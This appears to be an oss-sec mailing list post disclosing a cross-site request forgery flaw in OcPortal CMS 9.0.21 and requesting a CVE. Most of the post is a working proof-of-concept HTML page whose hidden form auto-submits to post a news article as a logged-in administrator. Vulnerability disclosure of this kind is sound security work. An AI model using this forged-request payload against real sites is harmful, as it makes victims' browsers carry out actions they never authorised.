oss-sec mailing list archives
OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability
From: CSW Research Lab <disclose () cybersecurityworks com>
Date: Mon, 21 Dec 2015 01:50:31 +0000
Hi all Can you please assign cve for this issue? http://ocportal.com/tracker/view.php?id=2074 Proof of Concept Code *************************** <!DOCTYPE> <html lang="en"> <head> <title>OcPortal 9.0.21 CSRF Vulnerability POC</title> </head> <body> <form action=" http://localhost/ocportal/cms/index.php?page=cms_news&type=_ad&uploading=1" enctype="multipart/form-data" method="post" id="formid"> <input type="hidden" name="MAX_FILE_SIZE" value="16777216" /> <input type="hidden" name="file1" value="" /> <input type="hidden" name="tick_on_form__validated" value="0" /> <input type="hidden" name="label_for__allow_rating" value="Allow rating" /> <input type="hidden" name="f_face" value="/" /> <input type="hidden" name="require__author" value="1" /> <input type="hidden" name="label_for__title" value="Title" /> <input type="hidden" name="file" value="" /> <input type="hidden" name="label_for__meta_description" value="Concise description" /> <input type="hidden" name="require__meta_description" value="0" /> <input type="hidden" name="validated" value="1" /> <input type="hidden" name="label_for__meta_keywords[]1" value="Keywords" /> <input type="hidden" name="label_for__meta_keywords[]0" value="Keywords" /> <input type="hidden" name="meta_description" value="Attack_OcPortal" /> <input type="hidden" name="allow_comments" value="1" /> <input type="hidden" name="comcode__news" value="1" /> <input type="hidden" name="http_referer" value=" http://localhost/ocportal/cms/index.php?page=cms_news&type=ad" /> <input type="hidden" name="author" value="Attack_OcPortal" /> <input type="hidden" name="pre_f_notes" value="1" /> <input type="hidden" name="post__is_wysiwyg" value="1" /> <input type="hidden" name="label_for__file" value="Image" /> <input type="hidden" name="comcode__title" value="1" /> <input type="hidden" name="require__news_category" value="0" /> <input type="hidden" name="allow_rating" value="1" /> <input type="hidden" name="tick_on_form__allow_rating" value="0" /> <input type="hidden" name="require__allow_comments" value="0" /> <input type="hidden" name="label_for__validated" value="Validated" /> <input type="hidden" name="label_for__notes" value="Notes" /> <input type="hidden" name="label_for__post" value="News article" /> <input type="hidden" name="meta_keywords[]" value="Attack_OcPortal" /> <input type="hidden" name="label_for__main_news_category" value="Main category" /> <input type="hidden" name="f_size" value="" /> <input type="hidden" name="require__allow_rating" value="0" /> <input type="hidden" name="label_for__author" value="Source" /> <input type="hidden" name="require__title" value="1" /> <input type="hidden" name="comcode__post" value="1" /> <input type="hidden" name="news" value="Attack_OcPortal" /> <input type="hidden" name="post" value="Attack_OcPortal" /> <input type="hidden" name="require__validated" value="0" /> <input type="hidden" name="news__is_wysiwyg" value="1" /> <input type="hidden" name="require__notes" value="0" /> <input type="hidden" name="label_for__allow_comments" value="Allow comments" /> <input type="hidden" name="posting_ref_id" value="13973" /> <input type="hidden" name="f_colour" value="" /> <input type="hidden" name="label_for__news" value="News summary" /> <input type="hidden" name="require__meta_keywords" value="0" /> <input type="hidden" name="notes" value="Attack_OcPortal" /> <input type="hidden" name="title" value="Attack_OcPortal" /> <input type="hidden" name="require__file" value="0" /> <input type="hidden" name="require__main_news_category" value="1" /> <input type="hidden" name="label_for__news_category" value="Secondary categories" /> <input type="hidden" name="main_news_category" value="7" /> </form> <script> document.getElementById('formid').submit(); </script> </body> </html> Credits & Authors ********************** Arjun Basnet from Cyber Security Works Pvt. Ltd. ( http://cybersecurityworks.com)
Current thread:
- OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability CSW Research Lab (Dec 20)